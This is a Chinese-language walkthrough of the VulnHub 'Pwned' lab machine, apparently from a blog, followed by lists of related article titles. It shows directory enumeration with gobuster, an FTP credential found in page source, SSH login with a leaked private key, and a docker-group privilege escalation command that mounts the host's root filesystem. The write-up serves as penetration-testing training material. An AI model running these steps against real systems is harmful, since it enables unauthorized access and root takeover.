1. 在浏览器输入地址打开网页
   

2. 端口扫描
   发现仅仅就开了三个端口；
   

3. 目录枚举
   使用gobuster工具发现了几个目录，接下来进行探测；
   gobuster dir -u http://10.36.201.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
   

   3.1发现hidden_text目录下存在一个secret.dic文件，打开之后都是一些目录，下载下来之后使用gobuster工具进行枚举；
   

   gobuster dir -u http://10.36.201.103/ -w secret.dic
   

   在浏览器打开这个目录pwned.vuln发现是一个登录框；
   

   查看网页源代码发现了ftp用户名和密码；
   $un==‘ftpuser’ && $pw==‘B0ss_B!TcH’

4. 登录ftp，查看有没有敏感信息；
发现了id_rsa,和note.txt文件，查看note.txt内容之后存在用户ariana，猜测这是
ariana的私钥，接下来进行组合登录；

1. ssh登录
   修改id_rsa权限为600，使用ssh -i id_rsa ariana@10.36.201.103命令登录，成功进入系统；
   

2. 查找有sudo权限的文件；
   Sudo -l
   发现home目录下存在一个可利用脚本，打开脚本查看内容存在漏洞；
   
   

3. 脚本利用
   这个脚本文件需要使用selena用户， sudo -u selena /home/messenger.sh；
   

4. 用户属于docker组漏洞利用
   使用id命令发现selena属于用户组docker，接下来使用命令
   docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
   附docker利用提权链接：https://blog.csdn.net/qq_41918771/article/details/103666135

Pwned Vulnhub相关推荐

1. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程！

   Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

2. Vulnhub靶机渗透之 RAVEN: 1

   目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）

   这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

4. 【Vulnhub靶机系列】DC2

   基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

5. 【Vulnhub靶机系列】DC1

   基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

6. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

   JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

7. 靶场练习第二十二天~vulnhub靶场之Momentum-2

   一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

8. 靶场练习第二十五天~vulnhub靶场之Raven-2

   一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

9. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

   一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

10. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

最新文章

1. 竹笋炒肉 I18N和L10N
2. java的知识点45——事务||测试时间处理(java.sql.date,time,timestamp)
3. ES6学习笔记（十六）async函数
4. Write a simple HTML Browser（hdu1088）
5. html调用文章标题,HTML中文章标题标签的详细介绍
6. 两场直播丨 手把手安装搭建GoldenDB、基于IB网络的Oracle Extend RAC最佳实践
7. 深度学习CNN系列笔记
8. 一个白学家眼里的 WebAssembly
9. oracle装载数据,如何在SqlLoader中装载日期型的数据
10. 天翼云虚拟IP地址及其在高可用集群中的应用
11. FMEA-MSR 步骤五：风险分析（一）
12. java右移位_Java移位运算符详解实例
13. 数据挖掘的9大成熟技术和应用
14. 技术交底书（三）-----一种虚拟现实共享及三维空间共享系统
15. matlab的蝶形运算,第五章快速傅里叶变换(蝶形运算).ppt
16. 【Python】爬虫-----下载B站视频
17. 电池SOC仿真系列-基于RNN的电池SOC估算研究
18. 实战八：美国人口普查数据进行收入预测分类
19. VS Code 修改字体 + 取消注释斜体 + 修改注释颜色
20. 大学英语四级电子照片修改过程。

热门文章

1. Java生成随机整数
2. 安卓Tasker自动转发短信到邮箱
3. 袁帅做了两件意义非凡的事
4. Python PIL库对阻挡文件blk进行解析，生成红绿色位图
5. 计算机单招考试零基础,单招英语零基础怎么学
6. 百练_2801:填词
7. 免费 whois 查询 API
8. 利用requests模块进行数据爬取的基本操作
9. 博客园Training Team加入申请帖
10. oracle查询导致 gc等待,RAC等待事件：gc buffer busy acquire